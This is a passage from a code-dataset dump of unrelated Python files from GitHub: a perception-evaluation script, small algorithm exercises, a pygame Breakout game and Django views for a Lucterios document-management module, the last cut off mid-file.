actual_init\n    return instance\n    \n\n    \n\n","repo_name":"GGuedesAB/Access-Control-System","sub_path":"tst/test_victor.py","file_name":"test_victor.py","file_ext":"py","file_size_in_byte":12017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"41400270839","text":"import utils\nimport config\nimport pandas as pd\nfrom datetime import datetime\nimport os\nimport openpyxl\n\nclass Eval3DFront:\n    def __init__(self, lable_path, perce_path):\n        '''Initialise the parameters'''\n        self.lable_path = lable_path\n        self.perce_path = perce_path\n        self.iou = config.front_config[\"iou\"]\n        self.obstacle_type_3d = config.front_config[\"obstacle_type_3d\"]\n        self.enum_obstacle = config.front_config[\"enum_obstacle\"]\n        self.topcut = config.front_config[\"top_cut\"]\n        self.top_black_edge = config.front_config[\"top_black_edge\"]\n        self.bottomcut = config.front_config[\"bottom_cut\"]\n        self.multiple = config.front_config[\"multiple\"]\n        self.range_y = config.front_config[\"range_y\"]\n        self.range_x_max_3d = config.front_config[\"range_x_max_3d\"]\n        self.current_path = os.getcwd()\n        self.str_time = (datetime.now()).strftime(\"%Y-%m-%d-%H-%M-%S\")\n        self.excel_path = os.path.join(self.current_path,self.str_time)\n        os.makedirs(self.excel_path, exist_ok=True)\n\n    def proc_json_data(self):\n        '''Match each json in the lable list with its counterpart in the perce list'''\n        self.lable_jsons_list = utils.get_json_list(self.lable_path)\n        self.perce_jsons_list_old = utils.get_json_list(self.perce_path)\n        self.perce_jsons_list = []\n        for lable_json in self.lable_jsons_list:\n            lable_num = int(os.path.basename(lable_json).split('_')[-1].split('.')[0])\n            for perce_json in self.perce_jsons_list_old:\n                perce_num = int(os.path.basename(perce_json).split('.')[0])\n                if lable_num==perce_num:\n                    self.perce_jsons_list.append(perce_json)\n        if len(self.lable_jsons_list)!=len(self.perce_jsons_list):\n            print('The number of perception jsons does not match the number of label jsons, please check!')\n    \n    def record_detection_result(self):\n        df = pd.DataFrame(columns=['frame_id','gt_type','gt_dist_x','gt_dist_y','gt_vel_x','perce_dist_x','perce_dist_y','perce_vel_x','dist_x_err','dist_y_err','vel_x_err','dist_x_err_rate','dist_y_err_rate','vel_x_err_rate'])\n        m = 0 \n        for i in range(len(self.lable_jsons_list)):\n            frameid = os.path.basename(self.lable_jsons_list[i]).split('.')[0]\n            lable_json_data = utils.get_json_data(self.lable_jsons_list[i])\n            perce_json_data = utils.get_json_data(self.perce_jsons_list[i])\n            lable_boxs_list = []\n            
lable_other_info_list = []\n            perce_boxs_list = []\n            perce_other_info_list = []\n            if lable_json_data==[]:\n                continue\n            else:\n                for lable_temp in lable_json_data:\n                    lable_box = {\"x\" : lable_temp[\"box_2d\"][\"x\"],\n                                 \"y\" : lable_temp[\"box_2d\"][\"y\"],\n                                 \"w\" : lable_temp[\"box_2d\"][\"w\"],\n                                 \"h\" : lable_temp[\"box_2d\"][\"h\"]}\n                    lable_type = lable_temp[\"type\"]\n                    lable_dist_x = lable_temp[\"position\"][\"x\"]\n                    lable_dist_y = lable_temp[\"position\"][\"y\"]\n                    lable_vel_x = lable_temp[\"velocity\"][\"x\"]\n                    lable_boxs_list.append(lable_box)\n                    lable_other_info_list.append([lable_type,lable_dist_x,lable_dist_y,lable_vel_x])\n            if perce_json_data==[] or perce_json_data[2][\"camera_fusion\"][\"tracks\"]==[]:\n                continue\n            else:\n                for perce_temp in perce_json_data[2][\"camera_fusion\"][\"tracks\"]:\n                    perce_box = {\"x\" : perce_temp[\"uv_bbox2d\"][\"obstacle_bbox.x\"],\n                                 \"y\" : perce_temp[\"uv_bbox2d\"][\"obstacle_bbox.y\"],\n                                 \"w\" : perce_temp[\"uv_bbox2d\"][\"obstacle_bbox.width\"],\n                                 \"h\" : perce_temp[\"uv_bbox2d\"][\"obstacle_bbox.height\"]}\n                    perce_dist_x = perce_temp[\"bbox3d\"][\"obstacle_pos_x\"]\n                    perce_dist_y = perce_temp[\"bbox3d\"][\"obstacle_pos_y\"]\n                    perce_vel_x = perce_temp[\"velocity\"][\"obstacle_rel_vel_x_filter\"]\n                    perce_boxs_list.append(perce_box)\n                    perce_other_info_list.append([perce_dist_x,perce_dist_y,perce_vel_x])\n            iou_result = {}\n            for j in range(len(lable_boxs_list)):\n                for k in range(len(perce_boxs_list)):\n                    iou_result[k] = utils.bb_intersection_over_union_front(lable_boxs_list[j],perce_boxs_list[k])\n                if iou_result=={}:\n                    continue\n                iou_max_item = max(iou_result.items(), key=lambda x: x[1])\n                iou_max_value = iou_max_item[1]\n                iou_max_id = iou_max_item[0]\n                if iou_max_value >= self.iou:\n                    # longitudinal and lateral errors\n                    dist_x_err = abs(lable_other_info_list[j][1] - perce_other_info_list[iou_max_id][0])\n                    dist_y_err = abs(lable_other_info_list[j][2] - perce_other_info_list[iou_max_id][1])\n                    vel_x_err = -1000 if lable_other_info_list[j][3]==-1000 else abs(lable_other_info_list[j][3] - perce_other_info_list[iou_max_id][2])\n                    # longitudinal and lateral error rates\n                    dist_x_err_rate = 0 if lable_other_info_list[j][1]==0 else dist_x_err/lable_other_info_list[j][1]\n                    dist_y_err_rate = 0 if lable_other_info_list[j][2]==0 else dist_y_err/lable_other_info_list[j][2]\n                    if vel_x_err==-1000:\n                        vel_x_err_rate = -1000\n                    elif lable_other_info_list[j][3]==0:\n                        vel_x_err_rate = 0\n                    else:\n                        vel_x_err_rate = vel_x_err/lable_other_info_list[j][3]\n\n                    df.loc[m,] = [frameid] + lable_other_info_list[j] + perce_other_info_list[iou_max_id] + [dist_x_err,dist_y_err,vel_x_err,dist_x_err_rate,dist_y_err_rate,vel_x_err_rate]\n                    m +=1\n                    del perce_boxs_list[iou_max_id]\n                    del perce_other_info_list[iou_max_id]\n        df.to_excel(os.path.join(self.excel_path,'record_detection_result.xlsx'))\n    \n    def eval_distance(self):\n        df = pd.read_excel(os.path.join(self.excel_path,'record_detection_result.xlsx'))\n        df1 = pd.read_excel(os.path.join(self.excel_path,'eval_dist_result.xlsx'))\n        for i in range(len(self.obstacle_type_3d)):\n            obstacle_type = self.obstacle_type_3d[i]\n            min_dis,mid_dis,max_dis = utils.get_dist_from_type_front(obstacle_type)\n            print(df[df['gt_type']==obstacle_type])\n\n    def eval_vel(self):\n        pass\n\n    ","repo_name":"xialinLi/kpi_eval_tool","sub_path":"eval_3d_front.py","file_name":"eval_3d_front.py","file_ext":"py","file_size_in_byte":6680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25837620072","text":"# Given an integer array, check if it contains a subarray having 
zero-sum.\n\n# Example:\n\"\"\"\nInput: { 3, 4, -7, 3, 1, 3, 1, -4, -2, -2 }\n \nOutput: Subarray with zero-sum exists\n \nThe subarrays with a sum of 0 are:\n \n{ 3, 4, -7 }\n{ 4, -7, 3 }\n{ -7, 3, 1, 3 }\n{ 3, 1, -4 }\n{ 3, 1, 3, 1, -4, -2, -2 }\n{ 3, 4, -7, 3, 1, 3, 1, -4, -2, -2 } \n\"\"\"\n\n\n\ndef subArrayExists(arr, n):\n\t# traverse through array\n\t# and store prefix sums\n\tn_sum = 0\n\ts = set()\n\n\tfor i in range(n):\n\t\tn_sum += arr[i]\n\n\t\t# If prefix sum is 0 or\n\t\t# it is already present\n\t\tif n_sum == 0 or n_sum in s:\n\t\t\treturn True\n\t\ts.add(n_sum)\n\n\treturn False\n\n\n# Driver code\narr = [-3, 4, -7, 3, 1, 3, 1, -4, -2, -2]\nn = len(arr)\nif subArrayExists(arr, n) == True:\n\tprint(\"Found a subarray with 0 sum\")\nelse:\n\tprint(\"No such subarray exists!\")\n\n","repo_name":"Ritik-Bhola/Arrays","sub_path":"2_Check-if-a-subarray-with-0-sum-exists-or-not.py","file_name":"2_Check-if-a-subarray-with-0-sum-exists-or-not.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4587298038","text":"\"\"\"\nCreated on 05/apr/2014\n\n@author: david\n\nProblem A. Store Credit\n(https://code.google.com/codejam/contest/351101/dashboard#s=p0)\n\n\n***Problem***\n\nYou receive a credit C at a local store and would like to buy two items.\nYou first walk through the store and create a list L of all available items.\nFrom this list you would like to buy two items that add up to the entire value of the credit.\nThe solution you provide will consist of the two integers indicating the positions\nof the items in your list (smaller number first).\n\n***Input***\n\nThe first line of input gives the number of cases, N. N test cases follow. For each test case there will be:\n\n - One line containing the value C, the amount of credit you have at the store.\n - One line containing the value I, the number of items in the store.\n - One line containing a space separated list of I integers. Each integer P indicates the price of an item in the store.\n - Each test case will have exactly one solution.\n\n***Output***\n\nFor each test case, output one line containing \"Case #x: \" followed by the indices of the\ntwo items whose price adds up to the store credit. The lower index should be output first.\n\n***Limits***\n\n5 ≤ C ≤ 1000\n1 ≤ P ≤ 1000\n\n***Small dataset***\n\nN = 10\n3 ≤ I ≤ 100\n\n***Large dataset***\n\nN = 50\n3 ≤ I ≤ 2000\n\n***Sample***\n\nInput\n3\n100\n3\n5 75 25\n200\n7\n150 24 79 50 88 345 3\n8\n8\n2 1 9 4 4 56 90 3\n\nOutput\nCase #1: 2 3\nCase #2: 1 4\nCase #3: 4 5\n\n\"\"\"\n__author__ = 'david'\n\nimport unittest\n\n\nclass StoreCredit(object):\n\n    def __init__(self, input_file_name=None, output_file_name=None):\n        self.input_file_name = input_file_name\n        self.output_file_name = output_file_name\n\n    # file I/O\n    def read_word(self, file):\n        return next(file).strip()\n\n    def read_int(self, file, b=10):\n        return int(self.read_word(file), b)\n\n    def read_words(self, file, d=' '):\n        return self.read_word(file).split(d)\n\n    def read_ints(self, file, b=10, d=' '):\n        return [int(x, b) for x in self.read_words(file, d)]\n\n    def solve(self):\n\n        # create I/O files\n        input_file = open(self.input_file_name, 'r')\n        output_file = open(self.output_file_name, \"w\")\n\n        # read file size\n        T = self.read_int(input_file)\n\n        # initialize cases to 1\n        case = 1\n\n        print(\"There are %d cases to solve! 
:)\\n\\n\" % T)\n\n # iterate on each case\n for l in range(0,T):\n\n # get problem data\n credit = self.read_ints(input_file)[0]\n num_of_items = self.read_ints(input_file)[0]\n item_prices = self.read_ints(input_file)\n\n # print(str(credit), str(num_of_items), str(item_prices))\n\n found = False\n i = 0\n\n while not found and i < len(item_prices)-1:\n\n for j in range(i+1,len(item_prices)):\n # print(item_prices[i],item_prices[j])\n if item_prices[i] + item_prices[j] == credit:\n print(\"ok! %d %d\" % (i+1,j+1))\n output_file.write(\"Case #%d: %d %d\\n\" % (case,i+1,j+1))\n found = True\n i += 1\n\n case += 1\n\n # close I/O files\n input_file.close()\n output_file.close()\n\n\nclass Test(unittest.TestCase):\n\n def test_solve(self):\n # sc_sample = StoreCredit(\"B-sample.in\", \"B-sample.out\")\n # sc_sample = StoreCredit(\"A-small-practice.in\", \"A-small-practice.out\")\n sc_sample = StoreCredit(\"A-large-practice.in\", \"A-large-practice.out\")\n sc_sample.solve()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"dosdos/googlecodejam","sub_path":"2010/africa_qualification_round/A_store_credit/store_credit.py","file_name":"store_credit.py","file_ext":"py","file_size_in_byte":3629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36194884206","text":"#initialize\nimport pygame\nimport random\npygame.init()\n\n#set up display\nwidth = 800\nheight = 600\nscreen = pygame.display.set_mode((width, height))\npygame.display.set_caption(\"Breakout Game\")\n\n#colors\nwhite = (255, 255, 255)\nblack = (0, 0, 0)\nteal = (0, 255, 255)\nred = (255, 0, 0)\n\n#variables\npaddle_width = 100\npaddle_height = 20\npaddle_x = (width - paddle_width) // 2\npaddle_y = height - paddle_height - 10\npaddle_speed = 3\n\nball_radius = 10\nball_x = width // 2\nball_y = height // 2\nball_speed_x = 0.5\nball_speed_y = 0.5\n\nbrick_width = 100\nbrick_height = 20\nbrick_rows = 5\nbrick_cols = width // brick_width\nbrick_colors = [white, teal, red]\nbricks = []\nfor row in range(brick_rows):\n brick_row = []\n for col in range(brick_cols):\n #randomly choose a color\n color = random.choice(brick_colors)\n #get brick x and y position with a 2 pixel space between bricks and 1 pixel space for the border\n brick_x = 1 + (brick_width + 2) * col\n brick_y = 1 + (brick_height + 2) * row\n #create a rectangle for the brick\n brick_rect = pygame.Rect(brick_x, brick_y, brick_width, brick_height)\n #add the brick to the bricks array/list\n bricks.append((brick_rect, color))\n\n\n\n#main loop\nrunning = True\nwhile running:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n #Move the paddle\n keys = pygame.key.get_pressed()\n if keys[pygame.K_LEFT] and paddle_x > 0:\n paddle_x -= paddle_speed\n if keys[pygame.K_RIGHT] and paddle_x < width - paddle_width:\n paddle_x += paddle_speed\n\n #Move the ball\n ball_x += ball_speed_x\n ball_y += ball_speed_y\n\n #Check for wall collisions then bounce it in the opposite direction if it hits a wall\n if ball_x > width - ball_radius or ball_x < ball_radius:\n ball_speed_x *= -1\n if ball_y > height - ball_radius or ball_y < ball_radius:\n ball_speed_y *= -1\n\n #Check for paddle collisions\n if ball_x > paddle_x and ball_x < paddle_x + paddle_width and ball_y > paddle_y and ball_y < paddle_y + paddle_height:\n ball_speed_y *= -1\n ball_speed_x *= -1\n\n #Check for brick collisions\n for brick in bricks:\n if ball_x > brick[0].x and ball_x < brick[0].x + brick_width and ball_y > 
brick[0].y and ball_y < brick[0].y + brick_height:\n            bricks.remove(brick)\n            ball_speed_y *= -1\n            break  # at most one brick per hit; removing while iterating would skip bricks\n\n    #Clear the screen\n    screen.fill(black)\n\n    #Draw everything\n    pygame.draw.rect(screen, white, (paddle_x, paddle_y, paddle_width, paddle_height))\n    pygame.draw.circle(screen, red, (ball_x, ball_y), ball_radius)\n    for brick in bricks:\n        pygame.draw.rect(screen, brick[1], brick[0])\n    pygame.display.flip()\n\n#Update the screen","repo_name":"AnaMuraya/game_dev_demos","sub_path":"breakout.py","file_name":"breakout.py","file_ext":"py","file_size_in_byte":2757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72868933212","text":"contacts = [\n    ('James', 42),\n    ('Amy', 24),\n    ('John', 31),\n    ('Amanda', 63),\n    ('Bob', 18)\n]\n\nentrada = input()\n\n# default to the miss message so an unmatched lookup cannot raise a NameError\nresult = 'Not Found'\n\nfor name, age in contacts:\n    if entrada == name:\n        result = f'{name} is {age}'\n        break\n\nprint(result)\n","repo_name":"atnzpe/python-guanabara","sub_path":"lista_de_contatos.py","file_name":"lista_de_contatos.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11900584810","text":"from __future__ import unicode_literals\nfrom os.path import join, exists\nfrom os import makedirs, walk\nfrom shutil import rmtree\nfrom zipfile import ZipFile\nfrom logging import getLogger\n\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.apps.registry import apps\nfrom django.db.models import Q\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.views.decorators.http import require_GET\nfrom django.views import View\n\nfrom lucterios.framework.xferadvance import XferListEditor, XferDelete, XferAddEditor, XferShowEditor,\\\n    TITLE_ADD, TITLE_MODIFY, TITLE_DELETE, TITLE_EDIT, TITLE_CANCEL, TITLE_OK,\\\n    TEXT_TOTAL_NUMBER, TITLE_CLOSE, TITLE_SAVE\nfrom lucterios.framework.xfersearch import XferSearchEditor\nfrom lucterios.framework.tools import MenuManage, FORMTYPE_NOMODAL, ActionsManage, \\\n    CLOSE_NO, FORMTYPE_REFRESH, SELECT_SINGLE, SELECT_NONE, \\\n    WrapAction, CLOSE_YES, SELECT_MULTI, get_url_from_request\nfrom lucterios.framework.xfercomponents import XferCompButton, XferCompLabelForm, \\\n    XferCompImage, XferCompUpLoad, XferCompDownLoad, XferCompSelect,\\\n    XferCompGrid\nfrom lucterios.framework.error import LucteriosException, IMPORTANT\nfrom lucterios.framework import signal_and_lock\nfrom lucterios.framework.xfergraphic import XferContainerAcknowledge\nfrom lucterios.framework.filetools import get_tmp_dir, get_user_dir\nfrom lucterios.CORE.parameters import notfree_mode_connect\nfrom lucterios.CORE.models import LucteriosGroup, LucteriosUser\nfrom lucterios.CORE.editors import XferSavedCriteriaSearchEditor\n\nfrom lucterios.documents.models import FolderContainer, DocumentContainer, AbstractContainer\nfrom lucterios.documents.doc_editors import DocEditor\n\n\nMenuManage.add_sub(\"documents.conf\", \"core.extensions\", \"\", _(\"Document\"), \"\", 10)\n\n\n@MenuManage.describ('documents.change_folder', FORMTYPE_NOMODAL, 'documents.conf', _(\"Management of document's folders\"))\nclass FolderList(XferListEditor):\n    caption = _(\"Folders\")\n    icon = \"documentConf.png\"\n    model = FolderContainer\n    field_id = 'folder'\n\n\n@ActionsManage.affect_grid(TITLE_ADD, \"images/add.png\")\n@ActionsManage.affect_grid(TITLE_MODIFY, \"images/edit.png\", 
unique=SELECT_SINGLE)\n@MenuManage.describ('documents.add_folder')\nclass FolderAddModify(XferAddEditor):\n icon = \"documentConf.png\"\n model = FolderContainer\n field_id = 'folder'\n caption_add = _(\"Add folder\")\n caption_modify = _(\"Modify folder\")\n\n def _search_model(self):\n current_folder = self.getparam('current_folder', 0)\n if (current_folder != 0) and (current_folder != self.getparam('folder', 0)):\n self.params['parent'] = current_folder\n XferAddEditor._search_model(self)\n\n def fillresponse(self):\n XferAddEditor.fillresponse(self)\n parentid = self.getparam('parent', 0)\n if (self.item.id is None) and (parentid != 0):\n parent = FolderContainer.objects.get(id=parentid)\n viewer = self.get_components('viewer')\n viewer.set_value([group.id for group in parent.viewer.all()])\n modifier = self.get_components('modifier')\n modifier.set_value([group.id for group in parent.modifier.all()])\n\n\n@ActionsManage.affect_grid(TITLE_DELETE, \"images/delete.png\", unique=SELECT_MULTI)\n@MenuManage.describ('documents.delete_folder')\nclass FolderDel(XferDelete):\n caption = _(\"Delete folder\")\n icon = \"documentConf.png\"\n model = FolderContainer\n field_id = 'folder'\n\n\nclass FolderImportExport(XferContainerAcknowledge):\n icon = \"documentConf.png\"\n model = FolderContainer\n field_id = 'folder'\n\n def add_components(self, dlg):\n pass\n\n def run_archive(self):\n pass\n\n def fillresponse(self):\n if self.getparam('SAVE') is None:\n dlg = self.create_custom()\n dlg.item = self.item\n img = XferCompImage('img')\n img.set_value(self.icon_path())\n img.set_location(0, 0, 1, 3)\n dlg.add_component(img)\n lbl = XferCompLabelForm('title')\n lbl.set_value_as_title(self.caption)\n lbl.set_location(1, 0, 6)\n dlg.add_component(lbl)\n\n dlg.fill_from_model(1, 1, False, desc_fields=['parent'])\n parent = dlg.get_components('parent')\n parent.colspan = 3\n\n self.add_components(dlg)\n dlg.add_action(self.return_action(TITLE_OK, \"images/ok.png\"), close=CLOSE_YES, params={'SAVE': 'YES'})\n dlg.add_action(WrapAction(TITLE_CANCEL, 'images/cancel.png'))\n else:\n if self.getparam(\"parent\", 0) != 0:\n self.item = FolderContainer.objects.get(id=self.getparam(\"parent\", 0))\n else:\n self.item = FolderContainer()\n self.run_archive()\n\n\n@ActionsManage.affect_grid(_(\"Import\"), \"zip.png\", unique=SELECT_NONE)\n@MenuManage.describ('documents.add_folder')\nclass FolderImport(FolderImportExport):\n caption = _(\"Import\")\n\n def add_components(self, dlg):\n dlg.fill_from_model(1, 2, False, desc_fields=['viewer', 'modifier'])\n zipfile = XferCompUpLoad('zipfile')\n zipfile.http_file = True\n zipfile.description = _('zip file')\n zipfile.maxsize = 1024 * 1024 * 1024 # 1Go\n zipfile.add_filter('.zip')\n zipfile.set_location(1, 15)\n dlg.add_component(zipfile)\n\n def run_archive(self):\n viewerids = self.getparam(\"viewer\", ())\n modifierids = self.getparam(\"modifier\", ())\n if 'zipfile' in self.request.FILES.keys():\n upload_file = self.request.FILES['zipfile']\n tmp_dir = join(get_tmp_dir(), 'zipfile')\n if exists(tmp_dir):\n rmtree(tmp_dir)\n makedirs(tmp_dir)\n try:\n with ZipFile(upload_file, 'r') as zip_ref:\n zip_ref.extractall(tmp_dir)\n viewers = LucteriosGroup.objects.filter(id__in=viewerids)\n modifiers = LucteriosGroup.objects.filter(id__in=modifierids)\n self.item.import_files(\n tmp_dir, viewers, modifiers, self.request.user)\n finally:\n if exists(tmp_dir):\n rmtree(tmp_dir)\n\n\n@ActionsManage.affect_grid(_(\"Extract\"), \"zip.png\", 
unique=SELECT_NONE)\n@MenuManage.describ('documents.add_folder')\nclass FolderExtract(FolderImportExport):\n caption = _(\"Extract\")\n\n def open_zipfile(self, filename):\n dlg = self.create_custom()\n dlg.item = self.item\n img = XferCompImage('img')\n img.set_value(self.icon_path())\n img.set_location(0, 0, 1, 3)\n dlg.add_component(img)\n lbl = XferCompLabelForm('title')\n lbl.set_value_as_title(self.caption)\n lbl.set_location(1, 0, 6)\n dlg.add_component(lbl)\n zipdown = XferCompDownLoad('filename')\n zipdown.compress = False\n zipdown.http_file = True\n zipdown.maxsize = 0\n zipdown.set_value(filename)\n zipdown.set_download(filename)\n zipdown.set_location(1, 15, 2)\n dlg.add_component(zipdown)\n\n def run_archive(self):\n tmp_dir = join(get_tmp_dir(), 'zipfile')\n download_file = join(get_user_dir(), 'extract.zip')\n if exists(tmp_dir):\n rmtree(tmp_dir)\n makedirs(tmp_dir)\n try:\n self.item.extract_files(tmp_dir)\n with ZipFile(download_file, 'w') as zip_ref:\n for (dirpath, _dirs, filenames) in walk(tmp_dir):\n for filename in filenames:\n zip_ref.write(\n join(dirpath, filename), join(dirpath[len(tmp_dir):], filename))\n finally:\n if exists(tmp_dir):\n rmtree(tmp_dir)\n self.open_zipfile('extract.zip')\n\n\nif not apps.is_installed(\"lucterios.contacts\"):\n MenuManage.add_sub(\"office\", None, \"lucterios.documents/images/office.png\", _(\"Office\"), _(\"Office tools\"), 70)\n\nMenuManage.add_sub(\"documents.actions\", \"office\", \"lucterios.documents/images/document.png\",\n _(\"Documents management\"), _(\"Documents storage tools\"), 80)\n\n\ndef docshow_modify_condition(xfer):\n if xfer.item.parent is not None and notfree_mode_connect() and not xfer.request.user.is_superuser:\n if xfer.item.parent.cannot_view(xfer.request.user):\n raise LucteriosException(IMPORTANT, _(\"No allow to view!\"))\n if xfer.item.parent.is_readonly(xfer.request.user):\n return False\n return True\n\n\ndef folder_notreadonly_condition(xfer, gridname=''):\n if notfree_mode_connect() and not xfer.request.user.is_superuser:\n if not hasattr(xfer, 'current_folder'):\n return False\n elif xfer.current_folder > 0:\n folder = FolderContainer.objects.get(id=xfer.current_folder)\n if folder.cannot_view(xfer.request.user):\n raise LucteriosException(IMPORTANT, _(\"No allow to view!\"))\n if folder.is_readonly(xfer.request.user):\n return False\n return True\n\n\n@ActionsManage.affect_grid(TITLE_ADD, \"images/add.png\", condition=folder_notreadonly_condition)\n@ActionsManage.affect_show(TITLE_MODIFY, \"images/edit.png\", close=CLOSE_YES, condition=docshow_modify_condition)\n@MenuManage.describ('documents.add_document')\nclass DocumentAddModify(XferAddEditor):\n icon = \"document.png\"\n model = DocumentContainer\n field_id = 'document'\n caption_add = _(\"Add document\")\n caption_modify = _(\"Modify document\")\n\n def _search_model(self):\n current_folder = self.getparam('current_folder', 0)\n if current_folder != 0:\n self.params['parent'] = current_folder\n XferAddEditor._search_model(self)\n\n def fillresponse(self):\n if not docshow_modify_condition(self):\n raise LucteriosException(IMPORTANT, _(\"No allow to write!\"))\n XferAddEditor.fillresponse(self)\n\n\n@ActionsManage.affect_grid(TITLE_EDIT, \"images/show.png\", unique=SELECT_SINGLE)\n@MenuManage.describ('documents.change_document')\nclass DocumentShow(XferShowEditor):\n caption = _(\"Show document\")\n icon = \"document.png\"\n model = DocumentContainer\n field_id = 'document'\n\n\n@ActionsManage.affect_show(_('Editor'), \"file.png\", 
modal=FORMTYPE_NOMODAL,\n close=CLOSE_YES, condition=lambda xfer: xfer.item.get_doc_editors(wantWrite=False) is not None)\n@MenuManage.describ('documents.add_document')\nclass DocumentEditor(XferContainerAcknowledge):\n caption = _(\"Edit document\")\n icon = \"document.png\"\n model = DocumentContainer\n field_id = 'document'\n\n def fillresponse(self):\n editor = self.item.get_doc_editors(self.request.user, False)\n if self.getparam('SAVE', '') == 'YES':\n editor.save_content()\n elif self.getparam('CLOSE', '') == 'YES':\n editor.close()\n else:\n editor.send_content()\n dlg = self.create_custom(self.model)\n dlg.item = self.item\n dlg.fill_from_model(0, 0, True, [('parent', 'name')])\n frame = XferCompLabelForm('frame')\n frame.set_value(editor.get_iframe())\n frame.set_location(0, 2, 2, 0)\n dlg.add_component(frame)\n if editor.withSaveBtn:\n dlg.add_action(self.return_action(TITLE_SAVE, 'images/save.png'), close=CLOSE_NO, params={'SAVE': 'YES'})\n dlg.add_action(WrapAction(TITLE_CLOSE, 'images/close.png'))\n dlg.set_close_action(self.return_action(), params={'CLOSE': 'YES'})\n\n\n@ActionsManage.affect_grid(_('Folder'), \"images/add.png\")\n@MenuManage.describ('documents.add_folder')\nclass ContainerAddFolder(XferContainerAcknowledge):\n caption = _(\"Add folder\")\n icon = \"document.png\"\n model = AbstractContainer\n field_id = 'container'\n\n def fillresponse(self, current_folder=0):\n self.redirect_action(FolderAddModify.get_action(), close=CLOSE_YES, params={'parent': current_folder})\n\n\ndef file_createnew_condition(xfer, gridname=''):\n if folder_notreadonly_condition(xfer, gridname):\n return (len(DocEditor.get_all_extension_supported()) > 0)\n else:\n return False\n\n\n@ActionsManage.affect_grid(_('File'), \"images/new.png\", condition=file_createnew_condition)\n@MenuManage.describ('documents.add_document')\nclass ContainerAddFile(XferContainerAcknowledge):\n caption = _(\"Create document\")\n icon = \"document.png\"\n model = DocumentContainer\n field_id = 'document'\n\n def fillresponse(self, current_folder=0, docext=\"\"):\n if current_folder == 0:\n current_folder = None\n if self.getparam('CONFIRME', '') == 'YES':\n self.params = {}\n filename_spited = self.item.name.split('.')\n if len(filename_spited) > 1:\n filename_spited = filename_spited[:-1]\n self.item.name = \"%s.%s\" % (\".\".join(filename_spited), docext)\n self.item.parent_id = current_folder\n self.item.editor.before_save(self)\n self.item.save()\n self.item.get_doc_editors(self.request.user, True).get_empty()\n self.redirect_action(DocumentEditor.get_action(), modal=FORMTYPE_NOMODAL, close=CLOSE_YES, params={'document': self.item.id})\n else:\n dlg = self.create_custom(self.model)\n max_row = dlg.get_max_row() + 1\n img = XferCompImage('img')\n img.set_value(self.icon_path())\n img.set_location(0, 0, 1, 6)\n dlg.add_component(img)\n dlg.item.parent_id = current_folder\n dlg.fill_from_model(1, max_row, True, ['parent'])\n dlg.fill_from_model(1, max_row + 1, False, ['name', 'description'])\n\n max_row = dlg.get_max_row() + 1\n select = XferCompSelect('docext')\n select.set_select([(item, item) for item in DocEditor.get_all_extension_supported()])\n select.set_value(select.select_list[0][1])\n select.set_location(1, max_row)\n select.description = _('document type')\n dlg.add_component(select)\n dlg.add_action(self.return_action(TITLE_OK, 'images/ok.png'), close=CLOSE_YES, params={'CONFIRME': 'YES'})\n dlg.add_action(WrapAction(TITLE_CLOSE, 'images/close.png'))\n\n\n@ActionsManage.affect_grid(TITLE_DELETE, 
\"images/delete.png\", unique=SELECT_MULTI, condition=folder_notreadonly_condition)\n@MenuManage.describ('documents.delete_document')\nclass DocumentDel(XferDelete):\n caption = _(\"Delete document\")\n icon = \"document.png\"\n model = DocumentContainer\n field_id = 'document'\n\n def fillresponse(self):\n if len(self.items) > 0:\n self.item = self.items[0]\n else:\n self.item = DocumentContainer()\n if not docshow_modify_condition(self):\n raise LucteriosException(IMPORTANT, _(\"No allow to write!\"))\n XferDelete.fillresponse(self)\n\n\n@MenuManage.describ('documents.change_document', FORMTYPE_NOMODAL, 'documents.actions', _(\"Management of documents\"))\nclass DocumentList(XferListEditor):\n caption = _(\"Documents\")\n icon = \"document.png\"\n model = DocumentContainer\n field_id = 'document'\n\n def fillresponse_header(self):\n self.current_folder = self.getparam('current_folder', 0)\n if self.current_folder > 0:\n self.filter = Q(parent=self.current_folder)\n else:\n self.filter = Q(parent=None)\n self.fill_current_folder()\n\n def fillresponse(self):\n XferListEditor.fillresponse(self)\n self.move_components('document', 1, -1)\n self.get_components('document').colspan = 4\n if folder_notreadonly_condition(self):\n self.add_document()\n\n def fill_current_folder(self):\n lbl = XferCompLabelForm('title_folder')\n if self.current_folder > 0:\n folder_obj = FolderContainer.objects.get(id=self.current_folder)\n lbl.set_value(folder_obj.get_title())\n folder_description = folder_obj.description\n else:\n folder_obj = FolderContainer()\n lbl.set_value('>')\n folder_description = \"\"\n lbl.set_location(1, 2, 1)\n lbl.description = _(\"current folder:\")\n self.add_component(lbl)\n\n lbl = XferCompLabelForm('desc_folder')\n lbl.set_value_as_header(folder_description)\n lbl.set_location(0, 3, 2)\n self.add_component(lbl)\n\n if self.current_folder > 0:\n btn_return = XferCompButton('return')\n btn_return.set_location(2, 2)\n btn_return.set_is_mini(True)\n btn_return.set_action(self.request, self.return_action('', 'images/left.png'), params={'current_folder': folder_obj.parent_id if folder_obj.parent_id is not None else 0},\n modal=FORMTYPE_REFRESH, close=CLOSE_NO)\n self.add_component(btn_return)\n\n btn_edit = XferCompButton('edit')\n btn_edit.set_location(4, 2)\n btn_edit.set_is_mini(True)\n btn_edit.set_action(self.request, FolderAddModify.get_action('', 'images/edit.png'),\n params={'folder': self.current_folder}, close=CLOSE_NO)\n self.add_component(btn_edit)\n folder = XferCompGrid(\"current_folder\")\n folder.set_model(folder_obj.get_subfolders(self.request.user, False), [\"icon\", \"name\"])\n folder.set_location(0, 4, 1)\n folder.add_action(self.request, self.return_action(\"\", 'images/right.png'), close=CLOSE_NO, modal=FORMTYPE_REFRESH, unique=SELECT_SINGLE)\n folder.add_action(self.request, 